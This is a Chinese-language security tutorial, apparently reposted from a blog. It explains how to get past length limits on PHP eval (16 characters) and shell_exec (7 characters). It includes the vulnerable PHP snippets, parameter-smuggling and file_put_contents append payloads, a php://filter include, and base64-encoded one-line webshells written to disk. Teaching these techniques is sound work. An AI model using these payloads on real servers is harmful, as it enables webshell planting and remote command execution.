Eval绕过限制参数限制

news2024/11/17 7:30:35

PHP Eval函数参数限制在16个字符

PHP代码

 <?php
 $param = $_REQUEST['param'];  
 if (
     strlen($param) < 17 &&  stripos($param, 'eval') === false &&  stripos($param, 'assert') === false
 )
 {
     eval($param);
 }
 ?>
     
 # 部署环境属于ubuntu系统

通过GET传参绕过

由于是接收param参数,并且在最后面通过eval执行,所以我们可以控制参数执行一些简单的命令。比如phpinfo();

我们学习过eval是PHP的代码执行方法,并且在Linux系统中是可以通过反引号来执行命令的。所以我们是不是可以通过eval + 反引号 吧代码执行转变为命令执行呢?

我们发现可以这样做,通过echo来输出结果。但是此时如果想写一句话木马就不行了,因为PHP代码中有限制长度。

所以我们是不是可以通过命名一个符合要求的新参数,并且通过GET或者POST传递参数,让eval执行传递的新参数,然后我们通过给新参数定义不同的内容来执行命令,那么不就可以突破长度限制了吗?

由于本地权限不高,我们并不能执行删库跑路代码。

但是由于在本地存在创建文件的权限,所以我们是不是可以在本地写一句话木马文件呢?

文件是可以创建的,所以我们可以在本地写一句话木马文件。

当然除去使用echo打印输出,我们也可以通过exec($_GET[1]);来进行。

用这个方法就可以绕过Eval函数参数限制的情况,利用难度比较低 但是环境要求高。

通过file_put_contents函数写文件绕过

file_put_contents函数

file_put_contents — 将数据写入文件

 file_put_contents(
     string $filename,
     mixed $data,
     int $flags = 0,
     ?resource $context = null
 ): int|false

如果 filename 不存在,将会创建文件。反之,存在的文件将会重写,除非设置 FILE_APPEND flag。

参数说明
filename要被写入数据的文件名。
data要写入的数据。类型可以是 string,array 或者是 stream 资源。
flagsflags 的值
context一个 context 资源。

FLAG内容

Flag描述
FILE_USE_INCLUDE_PATH在 include 目录里搜索 filename。 
FILE_APPEND如果文件 filename 已经存在,追加数据而不是覆盖。
LOCK_EX在写入时获取文件独占锁。换句话说,在调用 fopen() 和 fwrite()中间发生了 flock() 调用。这与调用带模式“x”的 fopen() 不同。

返回值 该函数将返回写入到文件内数据的字节数,失败时返回false。

通过file_put_contents函数我们可以写一个文件,然后一点点向文件里面添加内容,然后通过执行这个文件不就可以绕过长度的限制吗?

 ?1=file_put_contents&param=$_GET[1](N,P,file_append);

此时我们发现,param的内容超过16个字符了。所以被过滤掉了没有生成文件。

我们通过查询官方文档,file_append参数确实是追加啊。也没其他的形式是追加啊。

此时要注意了,因为PHP的底层代码是C语言。所以我们可以去看底层C语言代码是如何写的,通过查看我们发现C语言中追加的参数可以使用" 8 "代替。此时就可以解决长度问题了。

但是还有一个问题,我们发现file_put_contents函数无法追加一些特殊字符。所以我们可以提前内容进行Base64编码传递。

 ?1=file_put_contents&param=$_GET[1](N,P,8);  
 ​
 Base64编码内容:<?php eval($_POST[9]);
 Base64编码:PD9waHAgZXZhbCgkX1BPU1RbOV0pOw
 ​
 ?1=file_put_contents&param=$_GET[1](N,D,8);  
             ......
             
 # 执行文件
 ?param=include$_GET[1];&1=php://filter/read=convert.b  ase64-decode/resource=N
 ​
 读取文件的时候通过PHP的伪协议,通过Base64-decode将文件内容转成正常的一句话来读取内容。然后文件包含直接执行。因为文件包含会将一切内容都转为PHP文件进行执行。从而可以执行:"<?php eval($_POST[9]);"的内容

然后通过服务该文件,传递参数执行命令。

注意

如果遇到文件无法生成的问题,可能是权限不够。查看Nginx目录下html文件夹的所属用户以及所属组是否为www-data。如果不是需要通过chown目录修改文件的所属用户和所属组。

 # 语法
 chown [-R] ownname:groupname filename
 # -R 表示递归该文件夹下所有内容都所有文件的所属用户和所属组
 ​
 chown -R www-data:www-data html

命令长度限制突破技巧

Linux命令长度限制在7个字符

PHP代码

 <?php
 $param = $_REQUEST['param'];  
 if ( strlen($param) < 8 ) 
 {  
     echo shell_exec($param);
 }
 ?>

通过重定向写文件绕过

根据之前的经验,我们是不是可以通过一点一点写入问价写来绕过?显然是不可能的收到长度的限制,导致想法实现不了。Linux中可以通过重定向创建文件,并且可以定义文件的名称。如果我们是不是写一堆文件并且通过按照一定的顺序排序,从而将文件名写入到一个新的文件中,最后使用sh执行这个文件不就可以了?

  • ls -t 以创建时间来列出当前目录下所有文件

  • 文件列表以[换行符]分割每个文件

  • 引入 \ 转义ls时的换行

  • 换行不影响命令执行

  • 成功构造任意命令执行,写入Webshell

由于写入webshell中的PHP语句存在特殊字符,所以我们先将语句<?php eval($_GET[1]);通过base64进行编码PD9waHAgZXZhbCgkX0dFVFsxXSk7然后再一个一个慢慢的去上传。

最后通过echo追加文件到创建的c.php文件中以base64解码的形式。

 echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d>  c.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2046572.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

贪吃蛇+SDL2库【1】(c语言)

小白的学习记录 一、前置知识 注&#xff1a;博主是小白&#xff0c;所以记录的可能是一些无意中看到&#xff0c;但是不清楚的东西&#xff0c;所以大家择需了解。 JSON JSON&#xff08;JavaScript Object Notation&#xff09; 是一种轻量级的数据交换格式&#xff0c;易于…

10690 分面包

### 伪代码 1. 读取输入的 n 和 m&#xff0c;以及 m 个面包的长度 L。 2. 定义一个函数 canDivide(length)&#xff0c;判断是否可以将所有面包分成每人 length 长度的面包。 3. 使用二分法查找每人分得的最长面包长度&#xff1a; - 初始化 low 为 0&#xff0c;high 为所…

前端工程化-04.Vue项目简介

一.Vue项目-创建 1.使用如图两种方式创建Vue项目 2.在此创建新项目 点击创建项目 创建成功&#xff01; 二.Vue项目-目录结构 三.Vue项目-运行 启动后直接在下方找到连接端口 成功启动项目 这个项目即为Vue中的自带项目Vue.app。修改其中的Home为Vue Home。ctals保存发…

数学建模预测类—【一元线性回归】

每日格言&#xff1a;行动是治愈恐惧的良药&#xff0c;而犹豫拖延将不断滋养恐惧. 目录 前言 一、什么是回归分析&#xff1f; 1.概念理解 2.分类和一般步骤 二、一元线性回归&#xff08;Matlab算法&#xff09; 1.利用regress函数 2、例题讲解 总结 前言 在具体讲述线性回归…

如何在 Windows 10 中配置住宅 IP

什么是住宅IP 住宅IP指的是普通家庭网络的 IP 地址。你可以这样想&#xff1a; IP地址&#xff1a;每一个接入互联网的设备都有一个唯一的“地址”&#xff0c;就像每栋房子都有一个唯一的门牌号一样&#xff0c;这个地址就是IP地址。 住宅IP&#xff1a;指的是那些来自家庭用…

vue2父组件向子孙组件响应式传参,provide/inject响应式

provide和inject一起使用&#xff0c;实现将父组件的数据、方法提供给子孙组件使用&#xff0c;不论组件层次有多深。provide和inject绑定并不是可响应的。但如果你传入了一个可监听的对象&#xff0c;那么其对象的property还是可响应的。 API — Vue.js (vuejs.org)https://v…

完美解决html2canvas + jsPDF导出pdf分页内容截断问题

代码地址&#xff1a;https://github.com/HFQ12333/export-pdf.git html2canvas jspdf方案是前端实现页面打印的一种常用方案&#xff0c;但是在实践过程中&#xff0c;遇到的最大问题就是分页截断的问题&#xff1a;当页面元素超过一页A4纸的时候&#xff0c;连续的页面就会…

基于c++的yolov5推理之后处理详解及代码(二)

目录 一、解析yolov5的输出结果 1、对1*25200*85的向量进行解析 2、预测框中心&#xff08;x&#xff0c;y&#xff09;&#xff0c;预测框的高和宽&#xff08;h&#xff0c;w&#xff09;详解 3、解析代码&#xff1a; 二、confidence过滤 1、confidence计算 三、Non-Maxi…

C++笔记-sstream的使用(字符串转其他类型,读取文件时用得多)

在 C 中&#xff0c;std::stringstream 类可以用来进行字符串流的输入输出&#xff0c;将字符串和其他类型的数据进行转换。 #include <iostream> #include <sstream>int main() {// 将整数转换为字符串int num 123;std::stringstream ss;ss << num;std::s…

单元训练10:定时器实现秒表功能-数组方式

蓝桥杯 小蜜蜂 单元训练10&#xff1a;定时器实现秒表功能-数组方式 /** Description:* Author: fdzhang* Email: zfdcqq.com* Date: 2024-08-15 21:58:53* LastEditTime: 2024-08-16 19:07:27* LastEditors: fdzhang*/#include "stc15f2k60s2.h"#define LED(x) …

火语言RPA--手机对象元素库使用方法

使用自动选取工具获得手机中元素的xpath路径。 工具标识 手机 分组下组件若有此标识&#xff0c;则包含选择元素工具&#xff0c;点击此标识会可以选择手机中的元素进行操作。 元素库介绍 ① 根据元素名称筛选元素库中保存的元素 ② 元素库&#xff0c;显示已经保存的元素名称…

算法的学习笔记—链表中倒数第 K 个结点(牛客JZ22)

&#x1f600;前言 在编程过程中&#xff0c;链表是一种常见的数据结构&#xff0c;它能够高效地进行插入和删除操作。然而&#xff0c;遍历链表并找到特定节点是一个典型的挑战&#xff0c;尤其是当我们需要找到链表中倒数第 K 个节点时。本文将详细介绍如何使用双指针技术来解…

48天笔试训练错题——day47

目录 选择题 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 编程题 1. 合唱团 2. 马戏团 选择题 1. 子网掩码是 255.255.255.0&#xff0c;前三个字节都是 1&#xff0c;则表示有 24 位网络号和子网号。又是 B 类 IP 地址&#xff0c;只有 16 位网络号&#xff0c;所有第三个…

聊聊JS中的WebSocket

你好&#xff0c;我是沐爸&#xff0c;欢迎点赞、收藏和关注。个人知乎 在JavaScript中&#xff0c;使用WebSocket非常简单直观。通过几行代码&#xff0c;你就可以轻松创建一个WebSocket连接&#xff0c;并监听来自服务器的消息。无论是开发实时聊天应用、在线游戏、实时数据分…

高效录制新选择:2024年Windows录屏软件

录屏能帮助我们捕捉屏幕上的精彩瞬间&#xff0c;作为老师可以用来录制课程&#xff0c;作为会议记录员可以用来录制远程会议。那么有什么软件是适合windows录屏的呢&#xff1f;这次我们一起来探讨一下吧。 1.福昕录屏大师 链接&#xff1a;www.foxitsoftware.cn/REC/ 这款软…

【数据结构】 顺序表的应用 - 通讯录的实现

0. 前言 上一期博客中&#xff0c;我们已经学习了顺序表是什么&#xff0c;以及顺序表相关接口的实现&#xff0c;了解了如何实现顺序表的插入和删除等功能&#xff0c;那么在这期博客&#xff0c;我们可以基于顺序表来实现一个通讯录&#xff0c;在通讯录当中能实现联系人的增…

【代码随想录训练营第42期 Day27打卡 贪心Part1 - LeetCode 455.分发饼干 376. 摆动序列 53. 最大子序和

目录 一、贪心 二、题目与题解 题目一&#xff1a;455.分发饼干 题目链接 题解&#xff1a;排序双指针贪心 题目二&#xff1a;376. 摆动序列 题目链接 题解&#xff1a;贪心 题目三&#xff1a;53. 最大子序和 题目链接 题解1&#xff1a;暴力&#xff08;失败&…

解决生产环境服务启动失败:一次远程Bug排查与修复历程

一、问题现象 同事没事一直给服务器断电&#xff08;直接拔插头那种&#xff01;&#xff01;&#xff01;&#xff01;&#xff09; 二、初步排查 首先&#xff0c;我登录到生产服务器&#xff0c;查看服务启动日志。在日志中&#xff0c;我发现了一些异常信息&#xff0c;…

全网独家梳理:数字病理图像的常用存储格式以及格式转换的方法|24-08-17

小罗碎碎念 这一期推文&#xff0c;跟你们分享一些比较底层&#xff0c;并且顶刊中不会涉及但是又至关重要的内容。 我们在做任何一个病理AI的项目前&#xff0c;有两样东西是一定会拿到手的——切片&对应的临床基线表。&#xff08;如果做多组学/多模态的项目&#xff0c;…

宠物空气净化器推荐购买吗?真的能除毛去味吗?

自从做了猫咖店老板&#xff0c;我这生活真的是美滋滋&#xff0c;每天都可以摸到不同品种的可爱的小猫咪&#xff0c;在赚钱养家的同时还能肆意和猫咪贴贴&#xff0c;连朋友都说想和我干一样的工作了。每天接待的顾客也不少&#xff0c;店里面的空气质量也还不错&#xff0c;…